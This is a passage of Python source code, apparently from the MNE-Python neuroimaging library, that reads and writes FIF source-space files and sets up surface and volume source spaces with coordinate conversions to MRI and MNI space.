tag2 = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_USE_TRIANGLES)
if tag1 is None or tag2 is None:
res['nuse_tri'] = 0
res['use_tris'] = None
else:
res['nuse_tri'] = tag1.data
res['use_tris'] = tag2.data - 1 # index start at 0 in Python
# Patch-related information
tag1 = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NEAREST)
tag2 = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NEAREST_DIST)
if tag1 is None or tag2 is None:
res['nearest'] = None
res['nearest_dist'] = None
else:
res['nearest'] = tag1.data
res['nearest_dist'] = tag2.data.T
_add_patch_info(res)
# Distances
tag1 = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_DIST)
tag2 = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_DIST_LIMIT)
if tag1 is None or tag2 is None:
res['dist'] = None
res['dist_limit'] = None
else:
res['dist'] = tag1.data
res['dist_limit'] = tag2.data
        # Make the matrix symmetric (only one triangle is stored on disk)
res['dist'] = res['dist'] + res['dist'].T
if (res['dist'] is not None):
logger.info(' Distance information added...')
tag = find_tag(fid, this, FIFF.FIFF_SUBJ_HIS_ID)
if tag is None:
res['subject_his_id'] = None
else:
res['subject_his_id'] = tag.data
return res
@verbose
def _complete_source_space_info(this, verbose=None):
"""Add more info on surface."""
# Main triangulation
logger.info(' Completing triangulation info...')
this['tri_area'] = np.zeros(this['ntri'])
r1 = this['rr'][this['tris'][:, 0], :]
r2 = this['rr'][this['tris'][:, 1], :]
r3 = this['rr'][this['tris'][:, 2], :]
this['tri_cent'] = (r1 + r2 + r3) / 3.0
this['tri_nn'] = fast_cross_3d((r2 - r1), (r3 - r1))
this['tri_area'] = _normalize_vectors(this['tri_nn']) / 2.0
logger.info('[done]')
# Selected triangles
logger.info(' Completing selection triangulation info...')
if this['nuse_tri'] > 0:
r1 = this['rr'][this['use_tris'][:, 0], :]
r2 = this['rr'][this['use_tris'][:, 1], :]
r3 = this['rr'][this['use_tris'][:, 2], :]
this['use_tri_cent'] = (r1 + r2 + r3) / 3.0
this['use_tri_nn'] = fast_cross_3d((r2 - r1), (r3 - r1))
this['use_tri_area'] = np.linalg.norm(this['use_tri_nn'], axis=1) / 2.
logger.info('[done]')
def find_source_space_hemi(src):
"""Return the hemisphere id for a source space.
Parameters
----------
src : dict
The source space to investigate.
Returns
-------
hemi : int
Deduced hemisphere id.
"""
xave = src['rr'][:, 0].sum()
if xave < 0:
hemi = int(FIFF.FIFFV_MNE_SURF_LEFT_HEMI)
else:
hemi = int(FIFF.FIFFV_MNE_SURF_RIGHT_HEMI)
return hemi
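# Minimal sketch of the convention implemented above, using synthetic data:
# a surface whose vertices lie at negative x on average is treated as the
# left hemisphere.
def _example_find_source_space_hemi():
    fake_lh = dict(rr=np.array([[-0.05, 0.0, 0.0], [-0.04, 0.01, 0.02]]))
    fake_rh = dict(rr=np.array([[0.05, 0.0, 0.0], [0.04, 0.01, 0.02]]))
    assert find_source_space_hemi(fake_lh) == FIFF.FIFFV_MNE_SURF_LEFT_HEMI
    assert find_source_space_hemi(fake_rh) == FIFF.FIFFV_MNE_SURF_RIGHT_HEMI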
def label_src_vertno_sel(label, src):
"""Find vertex numbers and indices from label.
Parameters
----------
label : Label
Source space label.
src : dict
Source space.
Returns
-------
vertices : list of length 2
Vertex numbers for lh and rh.
src_sel : array of int (len(idx) = len(vertices[0]) + len(vertices[1]))
        Indices of the selected vertices in source space.
"""
if src[0]['type'] != 'surf':
        raise Exception('Labels are only supported with surface source '
                        'spaces')
vertno = [src[0]['vertno'], src[1]['vertno']]
if label.hemi == 'lh':
vertno_sel = np.intersect1d(vertno[0], label.vertices)
src_sel = np.searchsorted(vertno[0], vertno_sel)
vertno[0] = vertno_sel
vertno[1] = np.array([], int)
elif label.hemi == 'rh':
vertno_sel = np.intersect1d(vertno[1], label.vertices)
src_sel = np.searchsorted(vertno[1], vertno_sel) + len(vertno[0])
vertno[0] = np.array([], int)
vertno[1] = vertno_sel
elif label.hemi == 'both':
vertno_sel_lh = np.intersect1d(vertno[0], label.lh.vertices)
src_sel_lh = np.searchsorted(vertno[0], vertno_sel_lh)
vertno_sel_rh = np.intersect1d(vertno[1], label.rh.vertices)
src_sel_rh = np.searchsorted(vertno[1], vertno_sel_rh) + len(vertno[0])
src_sel = np.hstack((src_sel_lh, src_sel_rh))
vertno = [vertno_sel_lh, vertno_sel_rh]
else:
raise Exception("Unknown hemisphere type")
return vertno, src_sel
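# Illustrative sketch (hypothetical file name): restricting a surface source
# space to the vertices of a label. ``label`` would typically come from
# ``mne.read_label`` or an annotation parcellation.
def _example_label_selection(label):
    src = read_source_spaces('sample-oct6-src.fif')  # hypothetical path
    vertices, src_sel = label_src_vertno_sel(label, src)
    print('%d lh / %d rh vertices selected'
          % (len(vertices[0]), len(vertices[1])))
    return vertices, src_sel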
def _get_vertno(src):
return [s['vertno'] for s in src]
###############################################################################
# Write routines
@verbose
def _write_source_spaces_to_fid(fid, src, verbose=None):
"""Write the source spaces to a FIF file.
Parameters
----------
fid : file descriptor
An open file descriptor.
src : list
The list of source spaces.
%(verbose)s
"""
for s in src:
logger.info(' Write a source space...')
start_block(fid, FIFF.FIFFB_MNE_SOURCE_SPACE)
_write_one_source_space(fid, s, verbose)
end_block(fid, FIFF.FIFFB_MNE_SOURCE_SPACE)
logger.info(' [done]')
logger.info(' %d source spaces written' % len(src))
@verbose
def write_source_spaces(fname, src, overwrite=False, verbose=None):
"""Write source spaces to a file.
Parameters
----------
fname : str
The name of the file, which should end with -src.fif or
-src.fif.gz.
src : SourceSpaces
The source spaces (as returned by read_source_spaces).
%(overwrite)s
%(verbose)s
See Also
--------
read_source_spaces
"""
check_fname(fname, 'source space', ('-src.fif', '-src.fif.gz',
'_src.fif', '_src.fif.gz'))
_check_fname(fname, overwrite=overwrite)
fid = start_file(fname)
start_block(fid, FIFF.FIFFB_MNE)
if src.info:
start_block(fid, FIFF.FIFFB_MNE_ENV)
write_id(fid, FIFF.FIFF_BLOCK_ID)
data = src.info.get('working_dir', None)
if data:
write_string(fid, FIFF.FIFF_MNE_ENV_WORKING_DIR, data)
data = src.info.get('command_line', None)
if data:
write_string(fid, FIFF.FIFF_MNE_ENV_COMMAND_LINE, data)
end_block(fid, FIFF.FIFFB_MNE_ENV)
_write_source_spaces_to_fid(fid, src, verbose)
end_block(fid, FIFF.FIFFB_MNE)
end_file(fid)
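# Illustrative round trip (hypothetical file name): source spaces written with
# ``write_source_spaces`` can be read back with ``read_source_spaces``.
def _example_write_read_roundtrip(src):
    write_source_spaces('sample-copy-src.fif', src, overwrite=True)
    src_read = read_source_spaces('sample-copy-src.fif')
    assert len(src_read) == len(src)
    return src_read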
def _write_one_source_space(fid, this, verbose=None):
"""Write one source space."""
from scipy import sparse
if this['type'] == 'surf':
src_type = FIFF.FIFFV_MNE_SPACE_SURFACE
elif this['type'] == 'vol':
src_type = FIFF.FIFFV_MNE_SPACE_VOLUME
elif this['type'] == 'discrete':
src_type = FIFF.FIFFV_MNE_SPACE_DISCRETE
else:
raise ValueError('Unknown source space type (%s)' % this['type'])
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_TYPE, src_type)
if this['id'] >= 0:
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_ID, this['id'])
data = this.get('subject_his_id', None)
if data:
write_string(fid, FIFF.FIFF_SUBJ_HIS_ID, data)
write_int(fid, FIFF.FIFF_MNE_COORD_FRAME, this['coord_frame'])
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NPOINTS, this['np'])
write_float_matrix(fid, FIFF.FIFF_MNE_SOURCE_SPACE_POINTS, this['rr'])
write_float_matrix(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NORMALS, this['nn'])
# Which vertices are active
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_SELECTION, this['inuse'])
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NUSE, this['nuse'])
if this['ntri'] > 0:
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NTRI, this['ntri'])
write_int_matrix(fid, FIFF.FIFF_MNE_SOURCE_SPACE_TRIANGLES,
this['tris'] + 1)
if this['type'] != 'vol' and this['use_tris'] is not None:
# Use triangulation
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NUSE_TRI, this['nuse_tri'])
write_int_matrix(fid, FIFF.FIFF_MNE_SOURCE_SPACE_USE_TRIANGLES,
this['use_tris'] + 1)
if this['type'] == 'vol':
neighbor_vert = this.get('neighbor_vert', None)
if neighbor_vert is not None:
nneighbors = np.array([len(n) for n in neighbor_vert])
neighbors = np.concatenate(neighbor_vert)
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NNEIGHBORS, nneighbors)
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NEIGHBORS, neighbors)
write_coord_trans(fid, this['src_mri_t'])
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_VOXEL_DIMS, this['shape'])
start_block(fid, FIFF.FIFFB_MNE_PARENT_MRI_FILE)
write_coord_trans(fid, this['mri_ras_t'])
write_coord_trans(fid, this['vox_mri_t'])
mri_volume_name = this.get('mri_volume_name', None)
if mri_volume_name is not None:
write_string(fid, FIFF.FIFF_MNE_FILE_NAME, mri_volume_name)
mri_width, mri_height, mri_depth, nvox = _src_vol_dims(this)
interpolator = this.get('interpolator')
if interpolator is None:
interpolator = sparse.csr_matrix((nvox, this['np']))
write_float_sparse_rcs(fid, FIFF.FIFF_MNE_SOURCE_SPACE_INTERPOLATOR,
interpolator)
if 'mri_file' in this and this['mri_file'] is not None:
write_string(fid, FIFF.FIFF_MNE_SOURCE_SPACE_MRI_FILE,
this['mri_file'])
write_int(fid, FIFF.FIFF_MRI_WIDTH, mri_width)
write_int(fid, FIFF.FIFF_MRI_HEIGHT, mri_height)
write_int(fid, FIFF.FIFF_MRI_DEPTH, mri_depth)
end_block(fid, FIFF.FIFFB_MNE_PARENT_MRI_FILE)
# Patch-related information
if this['nearest'] is not None:
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NEAREST, this['nearest'])
write_float_matrix(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NEAREST_DIST,
this['nearest_dist'])
# Distances
if this['dist'] is not None:
# Save only upper triangular portion of the matrix
dists = this['dist'].copy()
dists = sparse.triu(dists, format=dists.format)
write_float_sparse_rcs(fid, FIFF.FIFF_MNE_SOURCE_SPACE_DIST, dists)
write_float_matrix(fid, FIFF.FIFF_MNE_SOURCE_SPACE_DIST_LIMIT,
this['dist_limit'])
# Segmentation data
if this['type'] == 'vol' and ('seg_name' in this):
# Save the name of the segment
write_string(fid, FIFF.FIFF_COMMENT, this['seg_name'])
##############################################################################
# Head to MRI volume conversion
@verbose
def head_to_mri(pos, subject, mri_head_t, subjects_dir=None,
verbose=None):
"""Convert pos from head coordinate system to MRI ones.
This function converts to MRI RAS coordinates and not to surface
RAS.
Parameters
----------
pos : array, shape (n_pos, 3)
The coordinates (in m) in head coordinate system.
%(subject)s
mri_head_t : instance of Transform
MRI<->Head coordinate transformation.
%(subjects_dir)s
%(verbose)s
Returns
-------
coordinates : array, shape (n_pos, 3)
The MRI RAS coordinates (in mm) of pos.
Notes
-----
This function requires nibabel.
"""
subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
t1_fname = op.join(subjects_dir, subject, 'mri', 'T1.mgz')
head_mri_t = _ensure_trans(mri_head_t, 'head', 'mri')
_, _, mri_ras_t, _, _ = _read_mri_info(t1_fname)
head_ras_t = combine_transforms(head_mri_t, mri_ras_t, 'head', 'ras')
return 1e3 * apply_trans(head_ras_t, pos) # mm
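# Illustrative sketch (hypothetical subject and subjects_dir): converting one
# point from head coordinates (meters) to MRI RAS coordinates (millimeters).
# ``mri_head_t`` would typically come from a ``*-trans.fif`` file.
def _example_head_to_mri(mri_head_t):
    pos_head = np.array([[0.01, 0.02, 0.05]])  # one point in head coords (m)
    return head_to_mri(pos_head, subject='sample', mri_head_t=mri_head_t,
                       subjects_dir='/path/to/subjects')  # shape (1, 3), mm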
##############################################################################
# Surface to MNI conversion
@verbose
def vertex_to_mni(vertices, hemis, subject, subjects_dir=None, verbose=None):
"""Convert the array of vertices for a hemisphere to MNI coordinates.
Parameters
----------
vertices : int, or list of int
Vertex number(s) to convert.
hemis : int, or list of int
Hemisphere(s) the vertices belong to.
%(subject)s
subjects_dir : str, or None
Path to SUBJECTS_DIR if it is not set in the environment.
%(verbose)s
Returns
-------
coordinates : array, shape (n_vertices, 3)
The MNI coordinates (in mm) of the vertices.
"""
singleton = False
if not isinstance(vertices, list) and not isinstance(vertices, np.ndarray):
singleton = True
vertices = [vertices]
if not isinstance(hemis, list) and not isinstance(hemis, np.ndarray):
hemis = [hemis] * len(vertices)
if not len(hemis) == len(vertices):
raise ValueError('hemi and vertices must match in length')
subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
surfs = [op.join(subjects_dir, subject, 'surf', '%s.white' % h)
for h in ['lh', 'rh']]
# read surface locations in MRI space
rr = [read_surface(s)[0] for s in surfs]
# take point locations in MRI space and convert to MNI coordinates
xfm = read_talxfm(subject, subjects_dir)
xfm['trans'][:3, 3] *= 1000. # m->mm
data = np.array([rr[h][v, :] for h, v in zip(hemis, vertices)])
if singleton:
data = data[0]
return apply_trans(xfm['trans'], data)
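# Illustrative sketch (hypothetical subject and subjects_dir): MNI coordinates
# of one vertex on each hemisphere of the white surface.
def _example_vertex_to_mni():
    coords = vertex_to_mni(vertices=[123, 456], hemis=[0, 1],
                           subject='sample',
                           subjects_dir='/path/to/subjects')
    return coords  # shape (2, 3), in mm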
##############################################################################
# Volume to MNI conversion
@verbose
def head_to_mni(pos, subject, mri_head_t, subjects_dir=None,
verbose=None):
"""Convert pos from head coordinate system to MNI ones.
Parameters
----------
pos : array, shape (n_pos, 3)
The coordinates (in m) in head coordinate system.
%(subject)s
mri_head_t : instance of Transform
MRI<->Head coordinate transformation.
%(subjects_dir)s
%(verbose)s
Returns
-------
coordinates : array, shape (n_pos, 3)
The MNI coordinates (in mm) of pos.
Notes
-----
    This function requires nibabel.
"""
subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
# before we go from head to MRI (surface RAS)
head_mni_t = combine_transforms(
_ensure_trans(mri_head_t, 'head', 'mri'),
read_talxfm(subject, subjects_dir), 'head', 'mni_tal')
return apply_trans(head_mni_t, pos) * 1000.
@verbose
def read_talxfm(subject, subjects_dir=None, verbose=None):
"""Compute MRI-to-MNI transform from FreeSurfer talairach.xfm file.
Parameters
----------
%(subject)s
%(subjects_dir)s
%(verbose)s
Returns
-------
mri_mni_t : instance of Transform
The affine transformation from MRI to MNI space for the subject.
"""
# Adapted from freesurfer m-files. Altered to deal with Norig
# and Torig correctly
subjects_dir = get_subjects_dir(subjects_dir)
# Setup the RAS to MNI transform
ras_mni_t = read_ras_mni_t(subject, subjects_dir)
ras_mni_t['trans'][:3, 3] /= 1000. # mm->m
# We want to get from Freesurfer surface RAS ('mri') to MNI ('mni_tal').
# This file only gives us RAS (non-zero origin) ('ras') to MNI ('mni_tal').
    # So we need to get the ras->mri transform from the MRI headers.
# To do this, we get Norig and Torig
# (i.e. vox_ras_t and vox_mri_t, respectively)
path = op.join(subjects_dir, subject, 'mri', 'orig.mgz')
if not op.isfile(path):
path = op.join(subjects_dir, subject, 'mri', 'T1.mgz')
if not op.isfile(path):
raise IOError('mri not found: %s' % path)
_, _, mri_ras_t, _, _ = _read_mri_info(path)
mri_mni_t = combine_transforms(mri_ras_t, ras_mni_t, 'mri', 'mni_tal')
return mri_mni_t
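# Illustrative sketch (hypothetical subject and subjects_dir): the returned
# MRI (surface RAS) -> MNI transform operates on positions given in meters.
def _example_read_talxfm():
    mri_mni_t = read_talxfm('sample', subjects_dir='/path/to/subjects')
    pt_mri = np.array([[0.0, 0.0, 0.0]])  # surface RAS origin, in meters
    return apply_trans(mri_mni_t, pt_mri)  # MNI position, in meters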
def _read_mri_info(path, units='m', return_img=False, use_nibabel=False):
# This is equivalent but 100x slower, so only use nibabel if we need to
# (later):
if use_nibabel:
import nibabel
hdr = nibabel.load(path).header
n_orig = hdr.get_vox2ras()
t_orig = hdr.get_vox2ras_tkr()
dims = hdr.get_data_shape()
zooms = hdr.get_zooms()[:3]
else:
hdr = _get_mgz_header(path)
n_orig = hdr['vox2ras']
t_orig = hdr['vox2ras_tkr']
dims = hdr['dims']
zooms = hdr['zooms']
# extract the MRI_VOXEL to RAS (non-zero origin) transform
vox_ras_t = Transform('mri_voxel', 'ras', n_orig)
# extract the MRI_VOXEL to MRI transform
vox_mri_t = Transform('mri_voxel', 'mri', t_orig)
# construct the MRI to RAS (non-zero origin) transform
mri_ras_t = combine_transforms(
invert_transform(vox_mri_t), vox_ras_t, 'mri', 'ras')
assert units in ('m', 'mm')
if units == 'm':
conv = np.array([[1e-3, 1e-3, 1e-3, 1]]).T
# scaling and translation terms
vox_ras_t['trans'] *= conv
vox_mri_t['trans'] *= conv
# just the translation term
mri_ras_t['trans'][:, 3:4] *= conv
out = (vox_ras_t, vox_mri_t, mri_ras_t, dims, zooms)
if return_img:
nibabel = _import_nibabel()
out += (nibabel.load(path),)
return out
###############################################################################
# Creation and decimation
@verbose
def _check_spacing(spacing, verbose=None):
"""Check spacing parameter."""
# check to make sure our parameters are good, parse 'spacing'
types = ('a string with values "ico#", "oct#", "all", or an int >= 2')
space_err = ('"spacing" must be %s, got type %s (%r)'
% (types, type(spacing), spacing))
if isinstance(spacing, str):
if spacing == 'all':
stype = 'all'
sval = ''
        elif spacing[:3] in ('ico', 'oct'):
stype = spacing[:3]
sval = spacing[3:]
try:
sval = int(sval)
except Exception:
raise ValueError('%s subdivision must be an integer, got %r'
% (stype, sval))
lim = 0 if stype == 'ico' else 1
if sval < lim:
raise ValueError('%s subdivision must be >= %s, got %s'
% (stype, lim, sval))
else:
raise ValueError(space_err)
else:
stype = 'spacing'
sval = _ensure_int(spacing, 'spacing', types)
if sval < 2:
raise ValueError('spacing must be >= 2, got %d' % (sval,))
if stype == 'all':
logger.info('Include all vertices')
ico_surf = None
src_type_str = 'all'
else:
src_type_str = '%s = %s' % (stype, sval)
if stype == 'ico':
logger.info('Icosahedron subdivision grade %s' % sval)
ico_surf = _get_ico_surface(sval)
elif stype == 'oct':
logger.info('Octahedron subdivision grade %s' % sval)
ico_surf = _tessellate_sphere_surf(sval)
else:
assert stype == 'spacing'
logger.info('Approximate spacing %s mm' % sval)
ico_surf = sval
return stype, sval, ico_surf, src_type_str
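# Minimal sketch of the ``spacing`` values accepted above (illustration only;
# 'ico'/'oct' values trigger loading or computing a tessellation).
def _example_check_spacing():
    for spacing in ('ico4', 'oct5', 'all', 7):
        stype, sval, ico_surf, s_str = _check_spacing(spacing, verbose=False)
        print('%r -> %s' % (spacing, s_str))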
@verbose
def setup_source_space(subject, spacing='oct6', surface='white',
subjects_dir=None, add_dist=True, n_jobs=1,
verbose=None):
"""Set up bilateral hemisphere surface-based source space with subsampling.
Parameters
----------
%(subject)s
spacing : str
The spacing to use. Can be ``'ico#'`` for a recursively subdivided
icosahedron, ``'oct#'`` for a recursively subdivided octahedron,
``'all'`` for all points, or an integer to use approximate
distance-based spacing (in mm).
.. versionchanged:: 0.18
Support for integers for distance-based spacing.
surface : str
The surface to use.
%(subjects_dir)s
add_dist : bool | str
Add distance and patch information to the source space. This takes some
time so precomputing it is recommended. Can also be 'patch' to only
compute patch information (requires SciPy 1.3+).
.. versionchanged:: 0.20
Support for add_dist='patch'.
%(n_jobs)s
Ignored if ``add_dist=='patch'``.
%(verbose)s
Returns
-------
src : SourceSpaces
The source space for each hemisphere.
See Also
--------
setup_volume_source_space
"""
cmd = ('setup_source_space(%s, spacing=%s, surface=%s, '
'subjects_dir=%s, add_dist=%s, verbose=%s)'
% (subject, spacing, surface, subjects_dir, add_dist, verbose))
subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
surfs = [op.join(subjects_dir, subject, 'surf', hemi + surface)
for hemi in ['lh.', 'rh.']]
for surf, hemi in zip(surfs, ['LH', 'RH']):
if surf is not None and not op.isfile(surf):
raise IOError('Could not find the %s surface %s'
% (hemi, surf))
logger.info('Setting up the source space with the following parameters:\n')
logger.info('SUBJECTS_DIR = %s' % subjects_dir)
logger.info('Subject = %s' % subject)
logger.info('Surface = %s' % surface)
stype, sval, ico_surf, src_type_str = _check_spacing(spacing)
logger.info('')
del spacing
logger.info('>>> 1. Creating the source space...\n')
# mne_make_source_space ... actually make the source spaces
src = []
# pre-load ico/oct surf (once) for speed, if necessary
if stype not in ('spacing', 'all'):
logger.info('Doing the %shedral vertex picking...'
% (dict(ico='icosa', oct='octa')[stype],))
for hemi, surf in zip(['lh', 'rh'], surfs):
logger.info('Loading %s...' % surf)
# Setup the surface spacing in the MRI coord frame
if stype != 'all':
logger.info('Mapping %s %s -> %s (%d) ...'
% (hemi, subject, stype, sval))
s = _create_surf_spacing(surf, hemi, subject, stype, ico_surf,
subjects_dir)
logger.info('loaded %s %d/%d selected to source space (%s)'
% (op.split(surf)[1], s['nuse'], s['np'], src_type_str))
src.append(s)
    logger.info('')  # newline after both hemispheres are processed
# Fill in source space info
hemi_ids = [FIFF.FIFFV_MNE_SURF_LEFT_HEMI, FIFF.FIFFV_MNE_SURF_RIGHT_HEMI]
for s, s_id in zip(src, hemi_ids):
# Add missing fields
s.update(dict(dist=None, dist_limit=None, nearest=None, type='surf',
nearest_dist=None, pinfo=None, patch_inds=None, id=s_id,
coord_frame=FIFF.FIFFV_COORD_MRI))
s['rr'] /= 1000.0
del s['tri_area']
del s['tri_cent']
del s['tri_nn']
del s['neighbor_tri']
# upconvert to object format from lists
src = SourceSpaces(src, dict(working_dir=os.getcwd(), command_line=cmd))
if add_dist:
dist_limit = 0. if add_dist == 'patch' else np.inf
add_source_space_distances(src, dist_limit=dist_limit,
n_jobs=n_jobs, verbose=verbose)
# write out if requested, then return the data
logger.info('You are now one step closer to computing the gain matrix')
return src
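# Illustrative sketch (hypothetical subject and subjects_dir): a bilateral
# surface source space with octahedron subdivision 6, skipping the (slow)
# distance computation.
def _example_setup_source_space():
    src = setup_source_space('sample', spacing='oct6', surface='white',
                             subjects_dir='/path/to/subjects',
                             add_dist=False)
    print(src)  # two surface source spaces, lh and rh
    return src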
def _check_mri(mri, subject, subjects_dir):
_validate_type(mri, 'path-like', 'mri')
if not op.isfile(mri):
if subject is None:
raise FileNotFoundError(
'MRI file %r not found and no subject provided' % (mri,))
subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
mri = op.join(subjects_dir, subject, 'mri', mri)
if not op.isfile(mri):
raise FileNotFoundError('MRI file %r not found' % (mri,))
return mri
def _check_volume_labels(volume_label, mri, name='volume_label'):
_validate_type(mri, 'path-like', 'mri when %s is not None' % (name,))
mri = _check_fname(mri, overwrite='read', must_exist=True)
if isinstance(volume_label, str):
volume_label = [volume_label]
_validate_type(volume_label, (list, tuple, dict), name) # should be
if not isinstance(volume_label, dict):
# Turn it into a dict
if not mri.endswith('aseg.mgz'):
raise RuntimeError(
'Must use a *aseg.mgz file unless %s is a dict, got %s'
% (name, op.basename(mri)))
lut, _ = read_freesurfer_lut()
use_volume_label = dict()
for label in volume_label:
if label not in lut:
raise ValueError(
'Volume %r not found in file %s. Double check '
'FreeSurfer lookup table.%s'
% (label, mri, _suggest(label, lut)))
use_volume_label[label] = lut[label]
volume_label = use_volume_label
for label, id_ in volume_label.items():
_validate_type(label, str, 'volume_label keys')
_validate_type(id_, 'int-like', 'volume_labels[%r]' % (label,))
volume_label = {k: _ensure_int(v) for k, v in volume_label.items()}
return volume_label
@verbose
def setup_volume_source_space(subject=None, pos=5.0, mri=None,
sphere=None, bem=None,
surface=None, mindist=5.0, exclude=0.0,
subjects_dir=None, volume_label=None,
add_interpolator=True, sphere_units='m',
single_volume=False, verbose=None):
"""Set up a volume source space with grid spacing or discrete source space.
Parameters
----------
subject : str | None
Subject to process. If None, the path to the MRI volume must be
absolute to get a volume source space. If a subject name
is provided the T1.mgz file will be found automatically.
Defaults to None.
pos : float | dict
Positions to use for sources. If float, a grid will be constructed
with the spacing given by ``pos`` in mm, generating a volume source
space. If dict, pos['rr'] and pos['nn'] will be used as the source
space locations (in meters) and normals, respectively, creating a
discrete source space.
.. note:: For a discrete source space (``pos`` is a dict),
``mri`` must be None.
mri : str | None
The filename of an MRI volume (mgh or mgz) to create the
interpolation matrix over. Source estimates obtained in the
volume source space can then be morphed onto the MRI volume
using this interpolator. If pos is a dict, this cannot be None.
        If a subject name is provided, ``mri`` will default to ``'aseg.mgz'``
        when ``volume_label`` is given, or to ``'T1.mgz'`` when ``pos`` is a
        float; otherwise it stays None.
sphere : ndarray, shape (4,) | ConductorModel | None
Define spherical source space bounds using origin and radius given
by (ox, oy, oz, rad) in ``sphere_units``.
Only used if ``bem`` and ``surface`` are both None. Can also be a
spherical ConductorModel, which will use the origin and radius.
None (the default) uses a head-digitization fit.
bem : str | None | ConductorModel
Define source space bounds using a BEM file (specifically the inner
        skull surface) or a ConductorModel for a 1-layer or 3-layer BEM.
surface : str | dict | None
Define source space bounds using a FreeSurfer surface file. Can
also be a dictionary with entries ``'rr'`` and ``'tris'``, such as
those returned by :func:`mne.read_surface`.
mindist : float
Exclude points closer than this distance (mm) to the bounding surface.
exclude : float
Exclude points closer than this distance (mm) from the center of mass
of the bounding surface.
%(subjects_dir)s
volume_label : str | dict | list | None
Region(s) of interest to use. None (default) will create a single
whole-brain source space. Otherwise, a separate source space will be
created for each entry in the list or dict (str will be turned into
a single-element list). If list of str, standard Freesurfer labels
are assumed. If dict, should be a mapping of region names to atlas
id numbers, allowing the use of other atlases.
.. versionchanged:: 0.21.0
Support for dict added.
add_interpolator : bool
If True and ``mri`` is not None, then an interpolation matrix
will be produced.
sphere_units : str
Defaults to ``"m"``.
.. versionadded:: 0.20
single_volume : bool
If True, multiple values of ``volume_label`` will be merged into a
a single source space instead of occupying multiple source spaces
(one for each sub-volume), i.e., ``len(src)`` will be ``1`` instead of
``len(volume_label)``. This can help conserve memory and disk space
when many labels are used.
.. versionadded:: 0.21
%(verbose)s
Returns
-------
src : SourceSpaces
A :class:`SourceSpaces` object containing one source space for each
entry of ``volume_labels``, or a single source space if
``volume_labels`` was not specified.
See Also
--------
setup_source_space
Notes
-----
    Volume source spaces are related to an MRI image such as T1 and allow
    visualizing source estimates overlaid on MRIs and morphing estimates
    to a template brain for group analysis. Discrete source spaces
don't allow this. If you provide a subject name the T1 MRI will be
used by default.
When you work with a source space formed from a grid you need to specify
the domain in which the grid will be defined. There are three ways
of specifying this:
(i) sphere, (ii) bem model, and (iii) surface.
    The default behavior is to use a sphere model
    (``sphere=(0.0, 0.0, 0.0, 90.0)``); if ``bem`` or ``surface`` is not
    ``None``, then ``sphere`` is ignored.
If you're going to use a BEM conductor model for forward model
it is recommended to pass it here.
To create a discrete source space, ``pos`` must be a dict, ``mri`` must be
None, and ``volume_label`` must be None. To create a whole brain volume
source space, ``pos`` must be a float and 'mri' must be provided.
To create a volume source space from label, ``pos`` must be a float,
``volume_label`` must be provided, and 'mri' must refer to a .mgh or .mgz
file with values corresponding to the freesurfer lookup-table (typically
``aseg.mgz``).
"""
subjects_dir = get_subjects_dir(subjects_dir)
_validate_type(
volume_label, (str, list, tuple, dict, None), 'volume_label')
if bem is not None and surface is not None:
raise ValueError('Only one of "bem" and "surface" should be '
'specified')
if mri is None and subject is not None:
if volume_label is not None:
mri = 'aseg.mgz'
elif _is_numeric(pos):
mri = 'T1.mgz'
if mri is not None:
mri = _check_mri(mri, subject, subjects_dir)
if isinstance(pos, dict):
raise ValueError('Cannot create interpolation matrix for '
'discrete source space, mri must be None if '
'pos is a dict')
if volume_label is not None:
volume_label = _check_volume_labels(volume_label, mri)
assert volume_label is None or isinstance(volume_label, dict)
sphere = _check_sphere(sphere, sphere_units=sphere_units)
# triage bounding argument
if bem is not None:
logger.info('BEM : %s', bem)
elif surface is not None:
if isinstance(surface, dict):
if not all(key in surface for key in ['rr', 'tris']):
raise KeyError('surface, if dict, must have entries "rr" '
'and "tris"')
# let's make sure we have geom info
complete_surface_info(surface, copy=False, verbose=False)
surf_extra = 'dict()'
elif isinstance(surface, str):
if not op.isfile(surface):
raise IOError('surface file "%s" not found' % surface)
surf_extra = surface
logger.info('Boundary surface file : %s', surf_extra)
else:
logger.info('Sphere : origin at (%.1f %.1f %.1f) mm'
% (1000 * sphere[0], 1000 * sphere[1], 1000 * sphere[2]))
logger.info(' radius : %.1f mm' % (1000 * sphere[3],))
# triage pos argument
if isinstance(pos, dict):
if not all(key in pos for key in ['rr', 'nn']):
raise KeyError('pos, if dict, must contain "rr" and "nn"')
pos_extra = 'dict()'
else: # pos should be float-like
try:
pos = float(pos)
except (TypeError, ValueError):
raise ValueError('pos must be a dict, or something that can be '
'cast to float()')
if not isinstance(pos, float):
logger.info('Source location file : %s', pos_extra)
logger.info('Assuming input in millimeters')
logger.info('Assuming input in MRI coordinates')
if isinstance(pos, float):
logger.info('grid : %.1f mm' % pos)
logger.info('mindist : %.1f mm' % mindist)
        pos /= 1000.0  # convert pos from mm to m
if exclude > 0.0:
logger.info('Exclude : %.1f mm' % exclude)
vol_info = dict()
if mri is not None:
logger.info('MRI volume : %s' % mri)
logger.info('')
logger.info('Reading %s...' % mri)
vol_info = _get_mri_info_data(mri, data=volume_label is not None)
    exclude /= 1000.0  # convert exclude from mm to m
logger.info('')
# Explicit list of points
if not isinstance(pos, float):
# Make the grid of sources
sp = [_make_discrete_source_space(pos)]
else:
# Load the brain surface as a template
if isinstance(bem, str):
# read bem surface in the MRI coordinate frame
